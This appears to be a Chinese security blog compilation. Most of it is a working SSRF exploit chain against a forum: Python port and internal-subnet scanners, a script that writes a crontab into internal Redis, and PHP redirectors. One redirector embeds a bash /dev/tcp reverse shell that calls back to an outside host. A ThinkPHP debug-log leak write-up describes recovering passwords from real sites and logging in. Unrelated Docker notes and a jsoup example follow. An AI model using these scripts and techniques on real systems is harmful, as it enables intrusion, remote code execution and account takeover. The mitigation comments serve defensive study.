扫描本机开放的端口:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-10-10 16:26:14
import requests
import threading
import Queue
import time

# Python 2 script (print statement, `Queue` module).
# Number of worker threads that drain the queue concurrently.
threads_count = 2
# Work queue of port numbers (as strings) consumed by run().
que = Queue.Queue()
# Serialises the "Open" prints so output from different workers does not interleave.
lock = threading.Lock()
threads = []
# Candidate ports.  Several entries are duplicated (389, 7001, 9088) and are simply probed twice.
ports = [21,22,23,25,69,80,81,82,83,84,110,389,389,443,445,488,512,513,514,873,901,1043,1080,1099,1090,1158,1352,1433,1434,1521,2049,2100,2181,2601,2604,3128,3306,3307,3389,4440,4444,4445,4848,5000,5280,5432,5500,5632,5900,5901,5902,5903,5984,6000,6033,6082,6379,6666,7001,7001,7002,7070,7101,7676,7777,7899,7988,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8069,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8098,8099,8980,8990,8443,8686,8787,8880,8888,9000,9001,9043,9045,9060,9080,9081,9088,9088,9090,9091,9100,9200,9300,9443,9871,9999,10000,10068,10086,11211,20000,22022,22222,27017,28017,50060,50070]
for i in ports:
    que.put(str(i))
def run():
    """Worker: take ports off the shared queue and probe each one.

    A port is probed by asking the forum's remote-image fetcher to load a
    URL on ssrf.php, which redirects it to ftp://127.0.0.1:<port>/.  The
    only signal used is whether the outer GET raises within the 2.8 s
    timeout; the response body is never inspected.
    """
    # NOTE: qsize() and get() are not atomic.  If another worker takes the
    # last item in between, get() blocks indefinitely -- harmless here only
    # because the threads are started as daemons.
    while que.qsize() > 0:
        p = que.get()
        # Progress line, overwritten in place (the trailing comma suppresses the newline).
        print p + "       \r",
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip=127.0.0.1%26port={port}%26data=helo.jpg[/img]".format(
                port=p)
            # `r` is never used; only "returned" vs. "raised" matters.
            r = requests.get(url,timeout=2.8)
        except:
            # Any exception is reported as "Open".  The author's heuristic is
            # presumably that an open port keeps the redirect hanging past the
            # timeout while a closed one fails fast.  The bare except also
            # catches KeyboardInterrupt and errors reaching the forum itself,
            # which are then mis-reported as open ports.
            lock.acquire()
            print "{port}  Open".format(port=p)
            lock.release()
# Start the workers as daemon threads: the interpreter exits as soon as the
# main thread does, without joining them.
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()

# Poll until the queue is drained.  The queue is empty before the last
# probes have finished, so results for the final ports can be lost when the
# process exits (`threads` is collected but never joined).
while que.qsize() > 0:
    time.sleep(1.0)

扫描内网开放6379端口的主机:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-07-05 20:55:30
# @Last Modified by:   Lcy
# @Last Modified time: 2016-07-21 14:38:04
import requests
import threading
import Queue
import time
# Python 2 script (print statement, `Queue` module).
# Number of worker threads that drain the queue concurrently.
threads_count = 20
# Work queue of IPv4 addresses (as strings) consumed by run().
que = Queue.Queue()
# Serialises the prints from different workers.
lock = threading.Lock()
threads = []
# /16 prefix.  The loops below queue 10.171.1.1 .. 10.171.254.254:
# range(1,255) is 1..254, so .0 and .255 are skipped in both octets.
ip = "10.171."
for i in range(1,255):
    for j in range(1,255):
        que.put(ip + str(i) + '.'+str(j))
# Disabled alternative: a single /24 sweep of the prefix.
# for i in range(0,255):
#     que.put(ip + str(i))
def run():
    """Worker: take hosts off the shared queue and check each for port 6379.

    Two SSRF requests are made per host.  The first (port 65321, over
    http) appears to act as a liveness check: if it raises, the host is
    dropped silently.  The second (port 6379, over https) is then tried; an
    exception there is reported as "6379 Open", a normal return just prints
    the address.  Neither response body is inspected.
    """
    while que.qsize() > 0:
        # Shadows the module-level `ip` prefix; harmless here but confusing.
        ip = que.get()
        try:
            url = "http://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="65321")
            # `r` is never used; only "returned" vs. "raised" matters.
            r = requests.get(url,timeout=5)
            
            try:
                # Note the scheme switch: this request goes to https://, the first to http://.
                url = "https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tools.phpinfo.me/ssrf.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img]".format(
                ip=ip,
                port="6379")
                r = requests.get(url,timeout=5)
                lock.acquire()
                print ip
                lock.release()
            except :
                # Same heuristic as the port scanner: an exception (typically
                # the 5 s timeout) on the 6379 probe is taken to mean "open".
                lock.acquire()
                print "{ip}  6379 Open".format(ip=ip)
                lock.release()
        except:
            # Bare except: any failure on the first probe -- including
            # KeyboardInterrupt and errors reaching the forum itself -- drops
            # the host without a trace.
            pass

# Start the workers as daemon threads: the interpreter exits as soon as the
# main thread does, without joining them.
for i in range(threads_count):
    t = threading.Thread(target=run)
    threads.append(t)
    t.setDaemon(True)
    t.start()
# Poll until the queue is drained.  The queue is empty before the last
# probes have finished, so results for the final hosts can be lost when the
# process exits (`threads` is collected but never joined).
while que.qsize() > 0:
    time.sleep(1.0)

通过ssrf操作内网redis写任务计划反弹shell:

#!/usr/bin/env python
# coding=utf-8
# email: ringzero@0x557.org

import requests

# Python 2 script (print statement).
# Five single-GET steps, each sent through the forum's remote-image fetcher
# (vul_httpurl) to a redirector (_location or shell_location) that forwards
# the request to the Redis instance at host:port.  Nothing inspects the
# forum's reply beyond its length, so a failed step goes unnoticed.
#
# Defender's notes: the chain appears to rely on Redis being reachable from
# the forum host without authentication and on CONFIG/SAVE being permitted;
# binding Redis to localhost, setting requirepass, renaming or disabling
# CONFIG and running it as an unprivileged user each break it.  On the
# forum side the fix is to validate remote-image URLs (scheme/host
# allow-list) and not follow redirects when fetching them.
host = '10.171.26.22'
port = '6379'
# Callback host/port that shell.php interpolates into its crontab line.
bhost = 'phpinfo.me'
bport = '32'

vul_httpurl = 'https://bbs.phpinfo.me/forum.php?mod=ajax&action=downremoteimg&message=[img]'

# Generic redirector (ssrf.php): scheme/host/port/path all from the query string.
_location = 'http://tools.phpinfo.me/ssrf.php'

# Redirector with the fixed SET payload (shell.php); used only in step 2.
shell_location = 'http://tools.phpinfo.me/shell.php'


#1 flush db

_payload = '?s=dict%26ip={host}%26port={port}%26data=flushall'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

# Only the response length is printed; whether Redis accepted the command is never checked.
print len(requests.get(exp_uri).content)



#2 set crontab command

_payload = '?s=dict%26ip={host}%26port={port}%26bhost={bhost}%26bport={bport}'.format(

    host = host,

    port = port,

    bhost = bhost,

    bport = bport)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(shell_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#3 config set dir /var/spool/cron/

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dir:/var/spool/cron/'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#4 config set dbfilename root

_payload = '?s=dict%26ip={host}%26port={port}%26data=config:set:dbfilename:root'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)



#5 save to file

_payload = '?s=dict%26ip={host}%26port={port}%26data=save'.format(

    host = host,

    port = port)

exp_uri = '{vul_httpurl}{0}{1}%23helo.jpg[/img]'.format(_location, _payload, vul_httpurl=vul_httpurl)

print exp_uri

print len(requests.get(exp_uri).content)

ssrf.php:

<?php
// Open redirector: scheme, host, port and path all come unvalidated from the
// query string, so the caller fully controls where the redirect points
// (ftp://, dict://, internal addresses, ...).  Missing parameters are read as
// null (with an undefined-index notice/warning) and interpolate as "".
// Mitigation: allow-list scheme and host or remove the endpoint; the client
// that follows this redirect should also refuse non-http(s) schemes.
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>

 

shell.php:

<?php
// Same redirector as ssrf.php, but the path is a fixed Redis SET whose value
// is a crontab line (runs every minute) that opens a reverse shell to
// $bhost:$bport; only the target and callback come from the query string.
// Detection: alert on CONFIG SET dir/dbfilename pointing at cron or ssh
// directories in Redis command logs, and on cron files that begin with RDB
// framing bytes rather than a comment or a crontab entry.
$ip = $_GET['ip'];
$port = $_GET['port'];
$bhost = $_GET['bhost'];
$bport = $_GET['bport'];
$scheme = $_GET['s'];
header("Location: $scheme://$ip:$port/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bhost}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\"");
?>

从hub.docker.com 获取镜像:

docker pull nginx:1.11.1  冒号后面是版本号,默认是latest

上传自己的镜像

docker login 默认登录hub.docker.com

docker push 镜像名

上传自己的镜像到私有仓库

docker tag nginx:1.11.1 phpinfo.me:5000/lcy/nginx:1.11.1

docker push phpinfo.me:5000/lcy/nginx:1.11.1

创建容器

docker run -d -p 5000:5000 --restart always --name registry -v /data/registry:/var/lib/registry registry:2

-d后台运行

-p  5000:5000 映射宿主的0.0.0.0:5000 -> 容器5000端口

--restart always  容器出错自动重启

--name registry 定义一个字符串(名字)

-v /data/registry:/var/lib/registry 映射宿主机的/data/registry 到容器的/var/lib/registry

-t -i /bin/bash  -t 运行容器里的程序,-i 以交互模式运行

-m 128m 指定容器运行内存为128m

 

保存容器状态,把容器保存为镜像:

docker commit -m "Added json gem" -a "Docker Newbee" 0b2616b0e5a8 lcys/nginx:1.11.1

-m 指定提交的说明信息,和git那个一样

-a 指定更新的用户信息

之后是用来创建镜像的容器的 ID

最后指定目标镜像的仓库名和 tag 信息

容器的操作:

ps 查看正在运行的容器, -a查看所有 ,-l查看历史运行(last)

run/create 启动和创建

第二个参数可以是容器的id或者names

start 对应stop的启动

stop/kill  stop停止容器,kill杀死容器

restart 重启容器

pause 暂停容器

unpause 恢复容器

logs 查看容器日志信息

stats 查看容器监控资源信息(cpu 内存 网络流量等)

top 查看容器进程信息

port 查看容器和宿主机映射端口信息

exec -it 登录容器id或名称 bash 登录容器操作(exec里面执行exit不会终止容器,而run -it里面exit会终止容器)

inspect 查看容器/镜像的详细信息

update 更新容器信息 -m 256m 更新内存为256m

cp 把容器文件copy到宿主机,或者把宿主机的文件copy到容器

docker cp 容器id或者name:/home/wwwroot/1.php /home/Lcy/ 把容器的1.php拷贝到宿主机家目录

docker cp  config.php 容器id或者name:/home/wwwroot/  把宿主机的config.php拷贝到容器

export 把容器保存为tar文件

import 把tar文件保存到镜像列表

rm  删除容器 -f强制删除

rmi  删除镜像

save 把镜像保存为tar文件

load  把镜像tar导入到镜像列表

 

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关的,所以影响应该很大吧

我们来看一下ThinkPHP3.2版本生成日志结构:

123

THINKPHP3.2 结构:Application\Runtime\Logs\Home\16_09_09.log

THINKPHP3.1结构:Runtime\Logs\Home\16_09_09.log

可以看到是 :项目名\Runtime\Logs\Home\年份_月份_日期.log

这样的话日志很容易被猜解到,而且日志里面有执行SQL语句的记录,这里我随便找几个tp站测试一下:

http://demo.xxxxx.cc/Runtime/Logs/User/16_09_06.log 成功下载,并且找到一个用户的密码

 

log

成功登录:

233333

我们再找一个案例:http://www.xxxxxx.com/Runtime/Logs/Home/16_09_06.log

 

1234

成功登录:

onethink官网测试

http://www.onethink.cn/Runtime/Logs/16_09_07.log

 

修复办法:

删除Runtime/Logs下的所有文件,并将APP_DEBUG设置为false

jsoup 是一款Java 的HTML解析器,可直接解析某个URL地址、HTML文本内容。它提供了一套非常省力的API,可通过DOM,CSS以及类似于jQuery的操作方法来取出和操作数据。

package lcy;



import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;


/** Minimal jsoup example: parse a one-link fragment and print the link target. */
public class Lcy {
	public static void main(String[] args) {
		String markup = "<a href=\"http://phpinfo.me\">Lcy博客</a>";
		// First <a> element of the parsed fragment.
		Element anchor = Jsoup.parse(markup).getElementsByTag("a").get(0);
		System.out.println(anchor.attr("href"));
	}
}

123

 

使用文档:http://www.open-open.com/jsoup/